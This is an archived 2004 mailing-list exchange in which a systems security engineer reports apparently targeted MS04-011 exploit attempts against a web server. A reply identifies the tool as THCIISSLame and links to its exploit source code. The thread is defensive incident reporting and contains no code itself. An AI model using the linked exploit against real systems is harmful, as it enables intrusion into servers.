Security Incidents mailing list archives

RE: Heads up: Looks like MS04-011 exploit is being tried against www.domain


From: "Rob Shein" <shoten () starpower net>
Date: Tue, 27 Apr 2004 10:40:12 -0400

It's the new THCIISSLame exploit, out on 4/21.

http://www.thc.org/exploits/THCIISSLame.c

-----Original Message-----
From: James Riden [mailto:j.riden () massey ac nz] 
Sent: Monday, April 26, 2004 11:14 PM
To: incidents () securityfocus com
Subject: Heads up: Looks like MS04-011 exploit is being tried against www.domain



Seen as long ago as 25/04/2004. Haven't seen it used against any other servers here, so it's obviously targeted in some way. Example packet capture:


-- 
James Riden / j.riden () massey ac nz / Systems Security Engineer
GPG public key available at: http://www.massey.ac.nz/~jriden/
This post does not necessarily represent the views of my employer.

